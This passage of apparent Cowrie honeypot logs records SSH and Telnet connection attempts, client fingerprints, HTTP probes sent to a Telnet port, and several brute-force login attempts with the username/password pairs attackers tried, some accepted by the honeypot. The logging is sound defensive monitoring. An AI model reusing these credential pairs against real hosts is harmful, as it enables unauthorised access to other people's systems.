:["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T08:41:53.217786Z","src_ip":"212.227.125.160","session":"1c5b61ea3187"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:41:53.219332Z","src_ip":"212.227.125.160","session":"1c5b61ea3187"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52440,"dst_ip":"1.2.3.4","dst_port":22,"session":"f60068c6b68c","protocol":"ssh","message":"New connection: 217.72.205.35:52440 (1.2.3.4:22) [session: f60068c6b68c]","sensor":"my-vps","timestamp":"2025-09-09T08:42:11.073939Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:42:11.075133Z","src_ip":"217.72.205.35","session":"f60068c6b68c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35041,"dst_ip":"1.2.3.4","dst_port":23,"session":"b914cb94f6ea","protocol":"telnet","message":"New connection: 212.227.235.229:35041 (1.2.3.4:23) [session: b914cb94f6ea]","sensor":"my-vps","timestamp":"2025-09-09T08:43:08.423147Z"}
{"eventid":"cowrie.session.closed","duration":12.376012563705444,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:43:20.799090Z","src_ip":"212.227.235.229","session":"b914cb94f6ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35097,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ad3c65205e2","protocol":"telnet","message":"New connection: 212.227.125.160:35097 (1.2.3.4:23) [session: 8ad3c65205e2]","sensor":"my-vps","timestamp":"2025-09-09T08:43:42.971275Z"}
{"eventid":"cowrie.session.closed","duration":12.646187543869019,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:43:55.617391Z","src_ip":"212.227.125.160","session":"8ad3c65205e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48077,"dst_ip":"1.2.3.4","dst_port":22,"session":"85abdf5e5da1","protocol":"ssh","message":"New connection: 212.227.125.160:48077 (1.2.3.4:22) [session: 85abdf5e5da1]","sensor":"my-vps","timestamp":"2025-09-09T08:46:19.923212Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:46:21.923443Z","src_ip":"212.227.125.160","session":"85abdf5e5da1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60713,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fb793fb7c1d","protocol":"ssh","message":"New connection: 212.227.125.160:60713 (1.2.3.4:22) [session: 3fb793fb7c1d]","sensor":"my-vps","timestamp":"2025-09-09T08:46:21.957186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:46:21.958042Z","src_ip":"212.227.125.160","session":"3fb793fb7c1d"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-09-09T08:46:21.992637Z","src_ip":"212.227.125.160","session":"3fb793fb7c1d"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:46:22.030077Z","src_ip":"212.227.125.160","session":"3fb793fb7c1d"}
{"eventid":"cowrie.session.connect","src_ip":"118.35.156.150","src_port":55546,"dst_ip":"1.2.3.4","dst_port":23,"session":"18a13bc87c91","protocol":"telnet","message":"New connection: 118.35.156.150:55546 (1.2.3.4:23) [session: 18a13bc87c91]","sensor":"my-vps","timestamp":"2025-09-09T08:47:18.240544Z"}
{"eventid":"cowrie.session.closed","duration":30.532355070114136,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:47:48.772825Z","src_ip":"118.35.156.150","session":"18a13bc87c91"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56998,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0433c46d8cb","protocol":"ssh","message":"New connection: 212.227.125.160:56998 (1.2.3.4:22) [session: f0433c46d8cb]","sensor":"my-vps","timestamp":"2025-09-09T08:47:55.338122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:47:55.724464Z","src_ip":"212.227.125.160","session":"f0433c46d8cb"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T08:47:55.725192Z","src_ip":"212.227.125.160","session":"f0433c46d8cb"}
{"eventid":"cowrie.login.success","username":"root","password":"kjashd123sadhj123d1SS","message":"login attempt [root/kjashd123sadhj123d1SS] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:47:59.215295Z","src_ip":"212.227.125.160","session":"f0433c46d8cb"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:48:00.012849Z","src_ip":"212.227.125.160","session":"f0433c46d8cb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60300,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd12d8f6559","protocol":"ssh","message":"New connection: 217.72.205.35:60300 (1.2.3.4:22) [session: 5bd12d8f6559]","sensor":"my-vps","timestamp":"2025-09-09T08:48:44.494248Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:48:44.495876Z","src_ip":"217.72.205.35","session":"5bd12d8f6559"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34674,"dst_ip":"1.2.3.4","dst_port":23,"session":"1de6471a09e2","protocol":"telnet","message":"New connection: 212.227.235.229:34674 (1.2.3.4:23) [session: 1de6471a09e2]","sensor":"my-vps","timestamp":"2025-09-09T08:48:47.450779Z"}
{"eventid":"cowrie.session.closed","duration":0.20256972312927246,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:48:47.653279Z","src_ip":"212.227.235.229","session":"1de6471a09e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50640,"dst_ip":"1.2.3.4","dst_port":23,"session":"741c245d5cec","protocol":"telnet","message":"New connection: 212.227.235.229:50640 (1.2.3.4:23) [session: 741c245d5cec]","sensor":"my-vps","timestamp":"2025-09-09T08:48:52.972378Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:48:52.973757Z","src_ip":"212.227.235.229","session":"741c245d5cec"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:48:52.975858Z","src_ip":"212.227.235.229","session":"741c245d5cec"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:48:52.976755Z","src_ip":"212.227.235.229","session":"741c245d5cec"}
{"eventid":"cowrie.session.closed","duration":0.3874626159667969,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:48:53.359773Z","src_ip":"212.227.235.229","session":"741c245d5cec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33052,"dst_ip":"1.2.3.4","dst_port":23,"session":"f9609ced6915","protocol":"telnet","message":"New connection: 212.227.125.160:33052 (1.2.3.4:23) [session: f9609ced6915]","sensor":"my-vps","timestamp":"2025-09-09T08:48:55.493963Z"}
{"eventid":"cowrie.session.closed","duration":0.16097068786621094,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:48:55.654852Z","src_ip":"212.227.125.160","session":"f9609ced6915"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39952,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ab894340f45","protocol":"telnet","message":"New connection: 212.227.125.160:39952 (1.2.3.4:23) [session: 8ab894340f45]","sensor":"my-vps","timestamp":"2025-09-09T08:49:01.782123Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:49:01.784001Z","src_ip":"212.227.125.160","session":"8ab894340f45"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:49:01.784835Z","src_ip":"212.227.125.160","session":"8ab894340f45"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:49:01.785589Z","src_ip":"212.227.125.160","session":"8ab894340f45"}
{"eventid":"cowrie.session.closed","duration":0.16246294975280762,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:49:01.944503Z","src_ip":"212.227.125.160","session":"8ab894340f45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50410,"dst_ip":"1.2.3.4","dst_port":23,"session":"e12094334d0f","protocol":"telnet","message":"New connection: 212.227.235.229:50410 (1.2.3.4:23) [session: e12094334d0f]","sensor":"my-vps","timestamp":"2025-09-09T08:50:33.734473Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:33.735852Z","src_ip":"212.227.235.229","session":"e12094334d0f"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:33.737012Z","src_ip":"212.227.235.229","session":"e12094334d0f"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:33.738613Z","src_ip":"212.227.235.229","session":"e12094334d0f"}
{"eventid":"cowrie.session.closed","duration":0.20138883590698242,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:50:33.935781Z","src_ip":"212.227.235.229","session":"e12094334d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50730,"dst_ip":"1.2.3.4","dst_port":23,"session":"00410533275c","protocol":"telnet","message":"New connection: 212.227.125.160:50730 (1.2.3.4:23) [session: 00410533275c]","sensor":"my-vps","timestamp":"2025-09-09T08:50:42.466973Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:42.467871Z","src_ip":"212.227.125.160","session":"00410533275c"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:42.468801Z","src_ip":"212.227.125.160","session":"00410533275c"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:42.469660Z","src_ip":"212.227.125.160","session":"00410533275c"}
{"eventid":"cowrie.session.closed","duration":0.15432214736938477,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:50:42.621227Z","src_ip":"212.227.125.160","session":"00410533275c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33268,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e20dc502634","protocol":"ssh","message":"New connection: 212.227.125.160:33268 (1.2.3.4:22) [session: 4e20dc502634]","sensor":"my-vps","timestamp":"2025-09-09T08:50:44.511304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:50:44.521084Z","src_ip":"212.227.125.160","session":"4e20dc502634"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-09T08:50:44.578838Z","src_ip":"212.227.125.160","session":"4e20dc502634"}
{"eventid":"cowrie.login.failed","username":"git","password":"Aa123456","message":"login attempt [git/Aa123456] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:44.761173Z","src_ip":"212.227.125.160","session":"4e20dc502634"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:50:45.831042Z","src_ip":"212.227.125.160","session":"4e20dc502634"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":38086,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dde10cc8f14","protocol":"ssh","message":"New connection: 139.19.117.131:38086 (1.2.3.4:22) [session: 1dde10cc8f14]","sensor":"my-vps","timestamp":"2025-09-09T08:50:59.840641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T08:50:59.841569Z","src_ip":"139.19.117.131","session":"1dde10cc8f14"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T08:50:59.859647Z","src_ip":"139.19.117.131","session":"1dde10cc8f14"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"11:4d:83:a2:9b:75:a3:12:55:e3:37:db:cc:14:f3:5b","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN1IvNH0ddhyLrsrbvmv0MwjBCWONtIwZks85of84kXP","type":"ssh-ed25519","message":"public key attempt for user admin of type ssh-ed25519 with fingerprint 11:4d:83:a2:9b:75:a3:12:55:e3:37:db:cc:14:f3:5b","sensor":"my-vps","timestamp":"2025-09-09T08:50:59.895906Z","src_ip":"139.19.117.131","session":"1dde10cc8f14"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"11:4d:83:a2:9b:75:a3:12:55:e3:37:db:cc:14:f3:5b","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN1IvNH0ddhyLrsrbvmv0MwjBCWONtIwZks85of84kXP","type":"ssh-ed25519","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T08:50:59.896733Z","src_ip":"139.19.117.131","session":"1dde10cc8f14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44376,"dst_ip":"1.2.3.4","dst_port":23,"session":"036879112191","protocol":"telnet","message":"New connection: 212.227.235.229:44376 (1.2.3.4:23) [session: 036879112191]","sensor":"my-vps","timestamp":"2025-09-09T08:51:07.516286Z"}
{"eventid":"cowrie.session.closed","duration":0.0011382102966308594,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:07.517350Z","src_ip":"212.227.235.229","session":"036879112191"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:09.840683Z","src_ip":"139.19.117.131","session":"1dde10cc8f14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32980,"dst_ip":"1.2.3.4","dst_port":22,"session":"96680c246bc4","protocol":"ssh","message":"New connection: 212.227.125.160:32980 (1.2.3.4:22) [session: 96680c246bc4]","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.144433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.146839Z","src_ip":"212.227.125.160","session":"96680c246bc4"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.188678Z","src_ip":"212.227.125.160","session":"96680c246bc4"}
{"eventid":"cowrie.login.success","username":"root","password":"coa","message":"login attempt [root/coa] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.316956Z","src_ip":"212.227.125.160","session":"96680c246bc4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:51:14.360960Z","src_ip":"212.227.125.160","session":"96680c246bc4"}
